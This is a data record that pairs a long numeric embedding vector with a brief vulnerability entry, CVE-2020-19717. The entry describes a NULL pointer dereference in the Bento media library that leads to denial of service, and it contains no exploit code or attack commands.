0.0024182384368032217, -0.028037961572408676, 0.01287340559065342, 0.00761807756498456, 0.00789015181362629, -0.012651450000703335, -0.014692006632685661, 0.008520218543708324, 0.01447721105068922, -0.003214771393686533, 0.0026079744566231966, 0.008176545612514019, -0.011527353897690773, -0.010274381376802921, -0.007098988629877567, -0.010174143128097057, -0.0012789277825504541, -0.0013048822293058038, -0.007904471829533577, 0.017512986436486244, -0.016123976558446884, 0.0037589198909699917, -0.023169266059994698, 0.01860128343105316, -0.00395581591874361, -0.005588260944932699, 0.02712150104343891, -0.0018758800579234958, -0.012350737117230892, -0.01015982311218977, -0.013009442947804928, -0.006343625020235777, -0.002450457774102688, 0.007410441990941763, 0.014319694600999355, -0.006569160148501396, -0.012408015318214893, -0.012715889140963554, 0.01835784874856472, -0.0036944812163710594, -0.011527353897690773, -0.004718339536339045, 0.01671108417212963, 0.0012073292164132, -0.0035494943149387836, 0.021407943218946457, 0.033479444682598114, 0.012322097085416317, 0.017126355320215225, -0.010238581337034702, 0.00616462854668498, -0.001046232646331191, -0.018214652314782143, -0.00905720703303814, 0.012314937077462673, 0.0012869825586676598, 0.015622787177562714, -0.005058431997895241, 0.018844718113541603, -0.006268446333706379, 0.0037338603287935257, 0.004045313689857721, 0.006085870321840048, 0.011749309487640858, 0.0020298168528825045, -0.025331540033221245, -0.004066793248057365, -0.01578030362725258, -0.001526837470009923, 0.01094740629196167, -0.04012378305196762, -0.025832729414105415, -0.0015689015854150057, -0.0033740780781954527, 0.03199019655585289, -0.009100166149437428, -0.007997549138963223, 0.0041634514927864075, -0.012336417101323605, -0.011355518363416195, -0.010367458686232567, -0.001965378178283572, 0.021049952134490013, -0.002504156669601798, 0.008348382078111172, 0.0031216933857649565, -0.026133442297577858, -0.027966363355517387, 0.01924566924571991, 0.03196156024932861, -0.009314961731433868, -0.017269551753997803, -0.026835108175873756, -0.0009934288682416081, -0.010990365408360958, -0.009823310188949108, -0.0018866198370233178, 0.006343625020235777, 0.005051272455602884, 0.0064474428072571754, 0.0016458699246868491, 0.0007097198977135122, -0.02871098741889, 0.014226616360247135, 0.008978448808193207, -0.01028154045343399, -0.00804050825536251, 0.0028388795908540487, 0.007961750030517578, 0.029298095032572746, -0.023670455440878868, 0.0022070228587836027, -0.009143125265836716, 0.016009418293833733, 0.03823358565568924, 0.00564911961555481, 0.0096586337313056, -0.009221883490681648, 0.038004469126462936, -0.017584584653377533, 0.007532159332185984, -0.003458206309005618, -0.007732635363936424, 0.019217031076550484, -0.022668076679110527, 0.005198049359023571, 0.013983181677758694, -0.004514283966273069, 0.011076283641159534, -0.0003163757501170039, -0.014097739942371845, -0.015336393378674984, 0.012945003807544708, 0.010517816059291363, 0.02334110252559185, 0.0030930540524423122, 0.021608419716358185, -0.00010415340511826798, -0.011985584162175655, -0.0029552269261330366, -0.015737345442175865, -0.006508301477879286, 0.010646693408489227, 0.02587568759918213, 0.014534490182995796, -0.010217102244496346, 0.01255837269127369, 0.005559621378779411, 0.0019886475056409836, -0.01570870541036129, 0.0049295551143586636, 0.012386536225676537, 0.01759890466928482, 0.004893755540251732, 0.013539271429181099, -0.010102544911205769, -0.02202369086444378, -0.010532135143876076, -0.005359145812690258, 0.01217890065163374, 0.004285168834030628, 0.00011511691991472617, 0.0029301675967872143, 0.008212344720959663, -0.0031324331648647785, -0.014441411942243576, -0.011455755680799484, 0.006780375260859728, -0.00899276789277792, -0.017441388219594955, -0.011971265077590942, -0.0037446001078933477, -0.025574974715709686, 0.023928210139274597, -0.004868696443736553, 0.008713534101843834, -0.0008757388568483293, 0.0008063777931965888, -0.050061654299497604, -0.03236250951886177, 0.008906850591301918, -0.0018060714937746525, 0.005530982278287411, 0.005634800065308809, -0.0072135464288294315, -0.015049999579787254, 0.002523846225813031, -0.0050691720098257065, 0.017083395272493362, -0.004525023512542248, 0.0012726628920063376, -0.000009795845471671782, -0.0016127555863931775, 0.025789771229028702, -0.012529732659459114, -0.013789866119623184, -0.006300665903836489, 0.0016217054799199104, 0.017512986436486244, 0.016682444140315056, -0.01473496574908495, 0.01223617885261774, -0.0042744288221001625, -0.012579851783812046, 0.02006189152598381, -0.007059609517455101, -0.029985440894961357, 0.019474785774946213, 0.005692078731954098, -0.022123929113149643, -0.007063189521431923, -0.022224165499210358, 0.004285168834030628, 0.012701569125056267, 0.022353043779730797, 0.032648902386426926, 0.003293529851362109, -0.00002300380583619699, 0.0007468615658581257, 0.007775594480335712, -0.01552254892885685, -0.022295765578746796, 0.0067445761524140835, 0.046281252056360245, 0.018329208716750145, -0.0048830159939825535, 0.0031467529479414225, 0.0052052089013159275, 0.005992792081087828, 0.003370498074218631, 0.007367482874542475, -0.02921217679977417, 0.018773119896650314, -0.005180149804800749, 0.007732635363936424, -0.016553567722439766, 0.008956968784332275, -0.004897335544228554, -0.0014946181327104568, 0.00016545959806535393, -0.008498738519847393, -0.002883628476411104, -0.02202369086444378, 0.013295836746692657, 0.014319694600999355, -0.001246708445250988, 0.012851926498115063, 0.005717138294130564, 0.007066769525408745, 0.002613344229757786, -0.0067911152727901936, -0.003567393869161606, -0.012229019775986671, -0.014649047516286373, 0.010081064887344837, 0.02245328202843666, -0.010489176027476788, 0.0041133323684334755, -0.006758896168321371, 0.008233824744820595, -0.010875808075070381, -0.005717138294130564, -0.006773215718567371, 0.02624800056219101, -0.007582278456538916, 0.010639533400535583, 0.017527306452393532, 0.027608372271060944, -0.01072545163333416, 0.006787535268813372, 0.005573941394686699, 0.012637130916118622, -0.005040532443672419, -0.011885346844792366, -0.0029731267131865025, -0.003053674940019846, -0.01349631231278181, 0.0012135941069573164, 0.008427140302956104, -0.008240984752774239, -0.011240960098803043, 0.019632302224636078, 0.004109752364456654, 0.014197977259755135, -0.020648999139666557, -0.023484298959374428, -0.009229043498635292, 0.016123976558446884, 0.01595214009284973, -0.011899665929377079, 0.017398430034518242, 0.021049952134490013, 0.008169385604560375, -0.02574681118130684, 0.00493671465665102, -0.020720599219202995, 0.010331659577786922, 0.007431921549141407, 0.0022088128607720137, -0.0031485429499298334, 0.019288629293441772, 0.022123929113149643, -0.009515437297523022, 0.007739794906228781, -0.0035119052045047283, -0.014126379042863846, -0.009279162622988224, -0.008226664736866951, -0.010260061360895634, 0.013517792336642742, -0.010804209858179092, -0.009909228421747684, -0.008226664736866951, -0.010890128090977669, 0.004725499078631401, -0.00375533988699317, -0.0054701236076653, -0.0029301675967872143, -0.009744551964104176, -0.016066698357462883, -0.025016507133841515, -0.00943667907267809, 0.027651330456137657, -0.010381778702139854, 0.0016583997057750821, 0.01578030362725258, 0.010424737818539143, 0.00015774038911331445, -0.0109402472153306, 0.004073953256011009, -0.007646717131137848, -0.005609740503132343, -0.011341198347508907, 0.007482040673494339, 0.011677711270749569, 0.019961655139923096, 0.009350760839879513, 0.02700694464147091, -0.010925927199423313, 0.011677711270749569, -0.005820956081151962, -0.009644314646720886, -0.008591816760599613, 0.02043420448899269, 0.005122870672494173, -0.0015402621356770396, -0.027178781107068062, -0.003787559224292636, -0.010124024003744125, -0.011319718323647976, 0.0023878091014921665, -0.02200937084853649, -0.013474833220243454, -0.013711107894778252, 0.001250288332812488, 0.002675992902368307, 0.017112035304307938, 0.004775618202984333, -0.013804186135530472, -0.001602910808287561, -0.007861512713134289, -0.021980730816721916, -0.006400903686881065, 0.019446145743131638, 0.011570313014090061, -0.016610845923423767, -0.015078638680279255, -0.008505898527801037, -0.009472478181123734, 0.00651188101619482, 0.0071168881841003895, -0.0031753922812640667, -0.008061988279223442, -0.009443839080631733, 0.004850796423852444, 0.008591816760599613, 0.03241978958249092, 0.028882823884487152, -0.0024003388825803995, -0.004618101753294468, -0.003383027855306864, 0.0008990083588287234, 0.0058603351935744286, 0.0033615482971072197, -0.014083419926464558, -0.008384181186556816, 0.027164461091160774, 0.006894933059811592, 0.010217102244496346, -0.005735037848353386, 0.011649072170257568, -0.011305399239063263, 0.022925831377506256, 0.007292304653674364, 0.020978352054953575, 0.004431945737451315, -0.019288629293441772, 0.013668148778378963, 0.003107373835518956, -0.020419884473085403, 0.0028138200286775827, -0.03588515520095825, 0.015193196013569832, 0.00246835732832551, -0.0033651283010840416, -0.01232925709336996, 0.011620432138442993, 0.009923548437654972, -0.006433122791349888, 0.010968886315822601, -0.008713534101843834, -0.0062362272292375565, -0.003232671180739999, -0.005344826262444258, -0.0026312440168112516, 0.01173498947173357, 0.012637130916118622, -0.03196156024932861, 0.005187309347093105, 0.01905951462686062, -0.009808991104364395, -0.010696811601519585, -0.0026061844546347857, -0.004897335544228554, -0.0036837414372712374, 0.010675332508981228, -0.026290958747267723, -0.018271930515766144, -0.02434348128736019, -0.004861536435782909, 0.016295813024044037, 0.021121550351381302, -0.008899690583348274, 0.02587568759918213, -0.00651188101619482, -0.015107277780771255, -0.008749333210289478, -0.027178781107068062, -0.028152519837021828, -0.02000461332499981, -0.009816151112318039, 0.022796954959630966, -0.029498571529984474, -0.024758752435445786, -0.018758799880743027, -0.004267269279807806, -0.000017368223780067638, -0.0003888692008331418, -0.0020047572907060385, -0.021966412663459778, -0.03047231025993824, 0.01280180737376213, -0.001420334680005908, -0.014090579934418201, -0.015250475145876408, 0.015035679563879967, -0.006146728992462158, -0.0005786051624454558, 0.01980413869023323, -0.019331587478518486, -0.00858465675264597, 0.0045107039622962475, -0.008233824744820595, -0.0003671659214887768, 0.0009227253613062203, -0.029111940413713455, -0.013353114947676659, 0.006651498377323151, -0.02404276840388775, -0.013811345212161541, 0.004918815102428198, 0.01464188750833273, -0.012479614466428757, -0.010245741344988346, -0.0025954446755349636, 0.0101526640355587, 0.005548881832510233, 0.027923405170440674, -0.003451046533882618, 0.011405636556446552, 0.011462915688753128, 0.013295836746692657, -0.023942530155181885, -0.004789937753230333, -0.02517402358353138, 0.002505946671590209, 0.004861536435782909, -0.005262488033622503, -0.00810494739562273, -0.0031628625001758337, 0.028983062133193016, 0.007904471829533577, 0.0024307682178914547, 0.020534442737698555, 0.006261286325752735, -0.020520122721791267, -0.01419081725180149, 0.021479541435837746, 0.007768434472382069, -0.02145090326666832, 0.0037947192322462797, 0.011684871278703213, -0.0018526104977354407, -0.0027977104764431715, -0.002253561979159713, -0.002835299586877227, -0.029054660350084305, -0.02958448976278305, -0.01709771528840065, -0.016739722341299057, -0.024500997737050056, 0.007396122440695763, -0.006676557473838329, 0.01671108417212963, 0.014935441315174103, -0.0009128805249929428, 0.01893063634634018, 0.017112035304307938, 0.00425652926787734, 0.0012297037756070495, 0.011777948588132858, -0.020892433822155, 0.005212368909269571, -0.0022446122020483017, -0.012465294450521469, -0.005337666254490614, 0.021551141515374184, -0.008319742977619171, -0.014412772841751575, -0.0023520097602158785, -0.013360274955630302, 0.017298191785812378, 0.006014271639287472, -0.006647918373346329, -0.0022052330896258354, -0.018271930515766144, -0.015407991595566273, 0.010403258726000786, -0.0077970740385353565, 0.011692030355334282, 0.025632252916693687, 0.0075393193401396275, 0.01747002825140953, 0.0006783955614082515, -0.021422263234853745, -0.0035011654254049063, 0.004843636881560087, 0.03216203302145004, -0.0034743158612400293, -0.02543177828192711, -0.003019665600731969, -0.029699046164751053, 0.026906706392765045, 0.0014713486889377236, -0.0037159607745707035, -0.015035679563879967, -0.007417601998895407, -0.00955839641392231, -0.0071670073084533215, 0.010231422260403633, -0.018085774034261703, 0.016353091225028038, 0.005097811575978994, -0.004467744845896959, 0.018973596394062042, 0.016195574775338173, -0.00905720703303814, 0.023555897176265717, 0.00190451939124614, 0.0008229349623434246, -0.0025668053422123194, 0.014119219034910202, 0.023627497255802155, -0.013195598497986794, -0.004746978636831045, -0.008455779403448105, -0.0032111916225403547, -0.014992720447480679, -0.006221907213330269, -0.01034597959369421, 0.010997525416314602, 0.008355542086064816, -0.011341198347508907, -0.002457617549225688, -0.0004432392888702452, 0.01397602166980505, 0.012565531767904758, 0.0001600897085154429, 0.009715912863612175, -0.0023770693223923445, 0.004267269279807806, 0.011033324524760246, -0.008849571458995342, 0.006225487217307091, 0.0015868011396378279, 0.002425398211926222, -0.003680161666125059, 0.01406909991055727, -0.026018885895609856, -0.016367411240935326, -0.002871098695322871, -0.0054916031658649445, -0.002466567326337099, -0.0017649023793637753, -0.017713462933897972, 0.015493909828364849, -0.013954542577266693, -0.009400879964232445, -0.0007388067315332592, -0.01160611305385828, -0.0033150094095617533, 0.031131016090512276, -0.03445318713784218, 0.010410417802631855, -0.02106427028775215, 0.009894909337162971, 0.02152250148355961, -0.0016789842629805207, 0.0034778958652168512, 0.003590663429349661, -0.011061964556574821, -0.02037692628800869, 0.023040389642119408, -0.00496893422678113, 0.004131231922656298, -0.007575118448585272, -0.01943182572722435, -0.027851806953549385, -0.003984455019235611, -0.00952975731343031, -0.01583758182823658, 0.0003011610824614763, 0.006934312172234058, -0.04421921819448471, -0.009551236405968666, -0.008949809707701206, -0.0033418587408959866, -0.001069502206519246, -0.016038058325648308, -0.029956800863146782, 0.008240984752774239, 0.021107230335474014, 0.005942673422396183, -0.0005065592122264206, 0.01031734049320221, 0.004285168834030628, 0.009200403466820717, -0.00164765992667526, -0.024758752435445786, 0.008806612342596054, 0.01578030362725258, -0.007532159332185984, -0.000015620213162037544, -0.004761298652738333, 0.005287547130137682, -0.019761178642511368, 0.017870979383587837, 0.025059465318918228, 0.02339838072657585, 0.007739794906228781, 0.008155066519975662, -0.010625213384628296, 0.014047620818018913, 0.0016628745943307877, 0.01590918004512787, 0.002312630647793412, -0.021808894351124763, -0.013474833220243454, -0.010310180485248566, 0.006021431647241116, -0.01759890466928482, 0.0076753562316298485, 0.02524562180042267, 0.0070273904129862785, -0.009128805249929428, -0.002477307105436921, 0.01454165019094944, -0.003998774569481611, -0.0013433663407340646, 0.006229067221283913, 0.005727877840399742, 0.028868503868579865, 0.012529732659459114, 0.01082568895071745, -0.0003584398655220866, -0.022682396695017815, -0.005176569800823927, -0.02283991314470768, 0.0073281037621200085, -0.0003906591737177223, -0.0007343318429775536, 0.007625237572938204, -0.007575118448585272, 0.009522597305476665, 0.01005958579480648, -0.005462963599711657, 0.005853175185620785, 0.002090675523504615, -0.00791163183748722, 0.01270872913300991, 0.007453401107341051, -0.003429566975682974, -0.0010122234234586358, -0.01702611707150936, -0.02706422284245491, 0.009236203506588936, -0.03041503205895424, -0.014033300802111626, -0.014964081346988678, -0.004464164841920137, 0.0035298047587275505, 0.0025310060009360313, 0.019918695092201233, 0.01595214009284973, -0.010961726307868958, 0.00763239711523056, 0.010711131617426872, 0.011255280114710331, -0.009859110228717327, -0.0014838783536106348, 0.01685428060591221, 0.004872275982052088, 0.008777973242104053, 0.011219481006264687, 0.002921217819675803, 0.00018839348922483623, -0.02011917158961296, -0.011534513905644417, 0.011262440122663975, -0.016983158886432648, -0.013639509677886963, 0.01084716897457838, 0.014849523082375526, 0.004800677765160799, 0.018028495833277702, 0.002829929580911994, -0.026892386376857758, -0.007460561115294695, 0.010575094260275364, 0.005638379603624344, -0.009135965257883072, -0.030644146725535393, 0.006587059702724218, -0.026018885895609856, 0.014369813725352287, -0.01387578435242176, -0.00867773499339819, -0.015193196013569832, 0.015450950711965561, -0.004414045717567205, -0.006393743678927422, 0.014620408415794373, 0.0021551139652729034, 0.0015894861426204443, 0.005480863153934479, 0.011262440122663975, -0.017713462933897972, 0.005584680940955877, -0.00610376987606287, 0.0034653660841286182, -0.005641959607601166, -0.002282201312482357, -0.02080651745200157, -0.006705197039991617, 0.022625118494033813, -0.00836270209401846, 0.002693892689421773, 0.005749357398599386, -0.010424737818539143, -0.011190841905772686, -0.004192090593278408, 0.011720670387148857, 0.01053929515182972, 0.009443839080631733, 0.03178972378373146, 0.014491531066596508, 0.01022426225244999, -0.01905951462686062, 0.006547680590301752, -0.013231397606432438, -0.013016602955758572, 0.00659063970670104, 0.0019510583952069283, 0.005015472881495953, -0.01066101249307394, 0.010231422260403633, -0.011491554789245129, 0.0012511833338066936, 0.015064318664371967, -0.028481872752308846, 0.022066649049520493, -0.0070273904129862785, 0.01397602166980505, 0.014892482198774815, 0.0066300188191235065, 0.0023466399870812893, 0.0038376781158149242, 0.020419884473085403, -0.0023681195452809334, -0.01037461869418621, 0.007073929067701101, 0.016353091225028038, -0.016367411240935326, 0.0012932474492117763, -0.004192090593278408, 0.005670599173754454, -0.020462844520807266, 0.015808943659067154, 0.01583758182823658, -0.0093650808557868, -0.005631220061331987, -0.007231445983052254, -0.003026825375854969, 0.0029516471549868584, -0.0019832777325063944, 0.029412653297185898, -0.004607361741364002, 0.005258908029645681, -0.0022213426418602467, 0.0004521891241893172, 0.008699215017259121, 0.0006063495529815555, 0.0033418587408959866, -0.005688498727977276, -0.00867773499339819, 0.007446241099387407, -0.0055775209330022335, -0.011169361881911755, 0.013446193188428879, -0.006995170842856169, 0.02617640234529972, 0.00112409598659724, 0.013460513204336166, -0.0032988996244966984, -0.015851901844143867, -0.009415199048817158, -0.0021819635294377804, -0.006175368558615446, 0.0014597139088436961, 0.021336345002055168, 0.03073006495833397, 0.008255303837358952, -0.004993993788957596, 0.0012646079994738102, 0.015479589812457561, 0.007145527750253677, -0.013761227019131184, -0.012651450000703335, -0.014763605780899525, 0.010396098718047142, 0.0011276759905740619, 0.013302996754646301, 0.03786127269268036, 0.020018933340907097, -0.03193292021751404, -0.007181326858699322, -0.02756541222333908, -0.007761274464428425, 0.010102544911205769, -0.009050047025084496, -0.011491554789245129, 0.004260109271854162, -0.024057086557149887, 0.01104048453271389, -0.01346767321228981, -0.03190428018569946, -0.004893755540251732, -0.0031360131688416004, 0.007861512713134289, -0.009229043498635292, 0.00693789217621088, 0.008777973242104053, 0.019274309277534485, 0.005355565808713436, -0.027794526889920235, 0.0038949570152908564, -0.0006121669430285692, 0.007424761541187763, 0.0011428906582295895, -0.015880541875958443, 0.005226688459515572, 0.01735546998679638, 0.00029064505361020565, 0.0012950374512001872, -0.01930294930934906, -0.027236059308052063, 0.014964081346988678, -0.014076259918510914, -0.0013934853486716747, 0.016553567722439766, -0.0068412343971431255, 0.014140699058771133, 0.01434833463281393, 0.006286345887929201, -0.001720153377391398, 0.010582254268229008, -0.018186012282967567, -0.012243338860571384, 0.011792268604040146, -0.014591769315302372, 0.0071634273044764996, -0.020147809758782387, -0.01372542791068554, -0.001624390366487205, 0.005201629363000393, 0.01993301510810852, 0.011255280114710331, 0.003050094936043024, -0.00410259235650301, -0.02076355740427971, -0.00103370298165828, -0.00033763155806809664, -0.007625237572938204, -0.0029337473679333925, 0.0006792905041947961, -0.002325160428881645, 0.00848441943526268, 0.0023484299890697002, 0.010023786686360836, -0.011670551262795925, -0.006970111280679703, 0.02402844838798046, -0.00975171197205782, 0.007976070046424866, -0.016453329473733902, -0.005058431997895241, 0.019145432859659195, -0.031131016090512276, 0.007696835789829493, 0.016252852976322174, -0.015250475145876408, -0.008169385604560375, -0.00858465675264597, -0.004711179528385401, 0.01653924770653248, -0.011427116580307484, 0.014384133741259575, -0.017069077119231224, 0.007381802890449762, 0.01337459497153759, 0.014555970206856728, 0.011348358355462551, 0.012923524715006351, -0.004596622195094824, -0.015851901844143867, -0.0014874582411721349, 0.02352725900709629, -0.001049812650308013, 0.015092958696186543, 0.004879435990005732, -0.005334086250513792, 0.015436630696058273, 0.016439009457826614, 0.02606184408068657, 0.006082290317863226, -0.012279137969017029, -0.01626717299222946, 0.009894909337162971, 0.0004962669336237013, -0.0060250116512179375, 0.011276759207248688, 0.0031378031708300114, 0.0017532675992697477, 0.018973596394062042, 0.01646764948964119, -0.0006725781713612378, -0.02195209264755249, 0.021565459668636322, 0.024114366620779037, 0.0019725379534065723, 0.011928305961191654, -0.004890176001936197, 0.005828115623444319, 0.02352725900709629, -0.0016378151485696435, -0.007524999789893627, 0.003812618786469102, -0.008326902985572815, -0.010997525416314602, 0.004814997315406799, -0.008670574985444546, -0.02889714390039444, 0.01811441406607628, -0.015995098277926445, 0.014964081346988678, 0.019102472811937332, 0.01683996059000492, -0.0041634514927864075, 0.004822157323360443, -0.00002480775219737552, 0.0008793187444098294, 0.011033324524760246, -0.027995003387331963, -0.009214723482728004, -0.02200937084853649, 0.006787535268813372, -0.00047702481970191, -0.009164604358375072, -0.0015850112540647388, -0.005394944921135902, 0.0068161748349666595, -0.001436444348655641, 0.010968886315822601, 0.0016583997057750821, 0.014470051974058151, 0.013761227019131184, -0.005942673422396183, 0.01917407102882862, 0.004836476873606443, -0.025188343599438667, -0.0035387545358389616, 0.007102568633854389, 0.03388039767742157, -0.004729079082608223, -0.02259647846221924, -0.0030787342693656683, 0.01434833463281393, -0.00611808942630887, 0.0033329089637845755, 0.009064367040991783, -0.01924566924571991, 0.016668124124407768, -0.00533050624653697, -0.009787511080503464, -0.014520170167088509, 0.0058853947557508945, -0.0029337473679333925, -0.00251489644870162, 0.007653876673430204, -0.0018561903852969408, 0.017369790002703667, -0.004263689275830984, -0.002548905787989497, 0.0020691959653049707, -0.01005958579480648, 0.024873310700058937, -0.01904519461095333, 0.016954518854618073, -0.0006099294987507164, 0.003085894277319312, -0.017870979383587837, 0.009050047025084496, 0.001046232646331191, 0.0037052209954708815, 0.005520242266356945, 0.010990365408360958, -0.014183657243847847, -0.004120492376387119, -0.002153324196115136, 0.01943182572722435, -0.033536724746227264, -0.02334110252559185, -0.0027153720147907734, -0.00801186915487051, -0.011140722781419754, 0.013474833220243454, 0.00761807756498456, -0.01620989479124546, -0.012157420627772808, -0.015064318664371967, 0.00751067977398634, 0.009350760839879513, 0.0028066602535545826, 0.004793517757207155, 0.01702611707150936, 0.03373720124363899, 0.00569565873593092, -0.0053054471500217915, -0.004818577319383621, 0.002645563567057252, -0.003604983212426305, -0.010431897826492786, -0.018014175817370415, -0.0024432979989796877, 0.004374666605144739, 0.009221883490681648, -0.00363541254773736, -0.004385406617075205, 0.0004980568774044514, -0.008355542086064816, 0.0007428341777995229, -0.01268009003251791, 0.010961726307868958, -0.00460378173738718, 0.012336417101323605, -0.004725499078631401, -0.01848672516644001, 0.02430052123963833, -0.024214603006839752, -0.00975171197205782, 0.01785665936768055, 0.009314961731433868, -0.00006639639468630776, 0.022553518414497375, 0.007016650401055813, 0.006261286325752735, 0.007575118448585272, 0.006651498377323151, -0.002692102687433362, -0.005692078731954098, 0.006866293493658304, 0.017828019335865974, 0.006866293493658304, 0.01728387176990509, 0.0019367387285456061, -0.005835275631397963, 0.010875808075070381, 0.00999514665454626, 0.005638379603624344, 0.006121669430285692, 0.014090579934418201, -0.018128734081983566, 0.014119219034910202, -0.009243362583220005, 0.030615506693720818, -0.0009603145299479365, -0.01526479423046112, 0.007324523758143187, -0.03015727736055851, 0.025345860049128532, 0.04771322384476662, 0.0033150094095617533, -0.007997549138963223, -0.004084692802280188, -0.003451046533882618, -0.014878163114190102, -0.02541745826601982, 0.009415199048817158, -0.007775594480335712, 0.008291102945804596, 0.023756373673677444, -0.011749309487640858, -0.006368684116750956, 0.008477259427309036, 0.009708752855658531, -0.003459996310994029, 0.030185917392373085, 0.006279186345636845, -0.027980683371424675, -0.0013988552382215858, 0.013961702585220337, -0.00760375801473856, -0.006873453501611948, 0.02385661192238331, 0.007596598006784916, -0.006175368558615446, 0.0024432979989796877, -0.006272026337683201, -0.010381778702139854, -0.005645539611577988, -0.009823310188949108, 0.0036730016581714153, -0.01397602166980505, -0.004317387938499451, -0.008491579443216324, -0.01685428060591221, -0.008262463845312595, 0.0021855435334146023, 0.009386559948325157, 0.009193244390189648, -0.02561793476343155, -0.0073746428824961185, -0.0019761179573833942, -0.0008453094633296132, 0.023240864276885986, -0.0038734774570912123, -0.006866293493658304, 0.007034549955278635, -0.023799331858754158, 0.007768434472382069, 0.0031753922812640667, 0.01094740629196167, -0.0035154849756509066, 0.01828625053167343, 0.00420999014750123, 0.0008860311354510486, -0.01523615512996912, -0.009794671088457108, 0.0255606546998024, 0.0007813183474354446, 0.014935441315174103, 0.022438962012529373, -0.00920756347477436, 0.01704043708741665, -0.004091852810233831, 0.0011616852134466171, -0.01981845684349537, -0.009851950220763683, 0.005266067571938038, 0.0024218184407800436, 0.017140675336122513, -0.009952187538146973, -0.012830446474254131, -0.016510607674717903, -0.0013755856780335307, -0.003877057461068034, 0.0005759202176705003, -0.006612119264900684, -0.004593042191118002, -0.0022034430876374245, 0.0025596453342586756, -0.00898560881614685, 0.005530982278287411, 0.02491626888513565, 0.02220984734594822, 0.012644290924072266, -0.017956897616386414, 0.012057183310389519, -0.001913469168357551, 0.0010328079806640744, -0.021909132599830627, -0.0029749164823442698, -0.01028154045343399, -0.0005991897196508944, -0.004736239090561867, 0.01943182572722435, -0.014505851082503796, 0.005935513414442539, -0.006107349880039692, -0.020491482689976692, 0.02454395778477192, 0.0006591534474864602, 0.003791139228269458, -0.008341222070157528, -0.03058686852455139, -0.0002211721584899351, 0.01220753975212574, -0.00041213870281353593, 0.03356536477804184, -0.020606040954589844, -0.01270872913300991, -0.01641036942601204, -0.01230061799287796, -0.0023108406458050013, 0.002096045296639204, -0.007346003316342831, -0.01378270611166954, -0.032333869487047195, -0.004514283966273069, 0.012200379744172096, 0.00946531817317009, 0.00619684811681509, 0.011684871278703213, -0.0077469549141824245, 0.003615722991526127, -0.01368962787091732, 0.007170587312430143, 0.009880589321255684, 0.01337459497153759, -0.009350760839879513, 0.008291102945804596, 0.017699142917990685, -0.016109656542539597, -0.02928377501666546, 0.04742683097720146, 0.014219457283616066, 0.022682396695017815, 0.024558275938034058, 0.007976070046424866, 0.025646572932600975, 0.0020602461881935596, -0.017427068203687668, -0.015178876928985119, 0.0033078494016081095, -0.0034653660841286182, -0.009837630204856396, 0.010739770717918873, -0.022925831377506256, -0.002078145742416382, 0.005319766700267792, -0.004782778210937977, 0.010166983120143414, 0.0024218184407800436, -0.012851926498115063, -0.01492112223058939, -0.015851901844143867, 0.01804281584918499, -0.01179942861199379, 0.000513271545059979, 0.006773215718567371, -0.0037016409914940596, -0.009143125265836716, 0.012150260619819164, -0.006225487217307091, 0.017828019335865974, -0.018372168764472008, -0.012372216209769249, 0.02989952266216278, 0.009601355530321598, -0.00012126991350669414, 0.031188296154141426, 0.017441388219594955, -0.014119219034910202, -0.01576598361134529, -0.012837606482207775, 0.009386559948325157, -0.007417601998895407, 0.003962975461035967, 0.008541697636246681, -0.005846015177667141, 0.005402104929089546, 0.009293481707572937, 0.01397602166980505, -0.008233824744820595, 0.02208096906542778, -0.004972514230757952, -0.00613598944619298, 0.004958194214850664, 0.003991615027189255, -0.011441436596214771, -0.0041383919306099415, -0.0010220682015642524, 0.0011867446592077613, -0.012343577109277248, -0.013746907003223896, -0.012372216209769249, -0.015665745362639427, 0.010431897826492786, -0.03330761194229126, -0.004474904853850603, 0.01094740629196167, 0.014591769315302372, -0.012651450000703335, 0.0013048822293058038, -0.006032171659171581, 0.0002097611577482894, -0.02137930504977703, 0.00006387926259776577, -0.01822897233068943, -0.0343099869787693, -0.00011780186468968168, -0.0014874582411721349, 0.002140794415026903, -0.013324475847184658, 0.0027511713560670614, -0.017756421118974686, -0.003445676527917385, -0.011348358355462551, -0.007227865979075432, -0.018400806933641434, -0.017899619415402412, -0.008441460318863392, -0.006014271639287472, 0.028854185715317726, 0.018959276378154755, 0.012007064186036587, -0.011663391254842281, 0.002117524854838848, 0.004045313689857721, -0.0038627376779913902, -0.01106912363320589, -0.009121645241975784, 0.007292304653674364, 0.011470075696706772, 0.003087684279307723, 0.026520075276494026, -0.024057086557149887, -0.010295860469341278, 0.021622739732265472, -0.0037517601158469915, -0.007804233580827713, 0.0025345860049128532, -0.00999514665454626, 0.007453401107341051, 0.025517696514725685, 0.0034528363030403852, -0.015407991595566273, -0.003680161666125059, 0.010789889842271805, -0.004306648392230272, 0.007904471829533577, 0.006687297485768795, 0.016668124124407768, -0.0015492120292037725, 0.001337101450189948, -0.004363927058875561, 0.030701424926519394, 0.018572643399238586, 0.02283991314470768, -0.003370498074218631, 0.015064318664371967, 0.034224070608615875, -0.0033257491886615753, 0.0025614353362470865, 0.0048328968696296215, -0.010582254268229008, 0.008226664736866951, 0.014326854608952999, 0.0033132194075733423, 0.0061861081048846245, -0.01211446151137352, 0.014606088399887085, 0.013868624344468117, -0.002090675523504615, -0.008914009667932987, 0.038949571549892426, -0.010174143128097057, 0.004174191039055586, 0.007610917557030916, -0.0020137070678174496, -0.005165829788893461, -0.0026294540148228407, -0.0010247532045468688, -0.0239854883402586, 0.004095432814210653, -0.005516662262380123, -0.0008914010250009596, 0.017584584653377533, -0.010109704919159412, -0.00013178594235796481, 0.013797026127576828, 0.013746907003223896, -0.025532016530632973, 0.012450974434614182, -0.015551188960671425, 0.008563177660107613, -0.004521443508565426, 0.006898513063788414, 0.008520218543708324, -0.0031521227210760117, -0.001058762427419424, -0.01492112223058939, 0.009544076398015022, 0.0019868577364832163, -0.000015578261809423566, -0.0010435477597638965, 0.006762475706636906, -0.007134787738323212, 0.013560750521719456, 0.0029749164823442698, 0.01609533652663231, -0.00454292306676507, 0.021622739732265472, 0.0036497320979833603, -0.009515437297523022, -0.004489224404096603, -0.007045289967209101, 0.03342216834425926, 0.05576089024543762, 0.01122664101421833, -0.014878163114190102, -0.006375844124704599, 0.002140794415026903, 0.017197953537106514, 0.0066550783812999725, -0.013166959397494793, 0.01240085531026125, -0.004045313689857721, -0.01943182572722435, 0.023498618975281715, 0.02769429050385952, 0.002452247776091099, 0.024143004789948463, -0.019789818674325943, -0.006934312172234058, -0.02606184408068657, -0.016882920637726784, 0.012343577109277248 ]
CVE-2020-19717
2021-07-13T22:15:08.943000
An unhandled memory allocation failure in Core/Ap48bdlAtom.cpp of Bento 1.5.1-628 causes a NULL pointer dereference, leading to a denial of service (DOS).
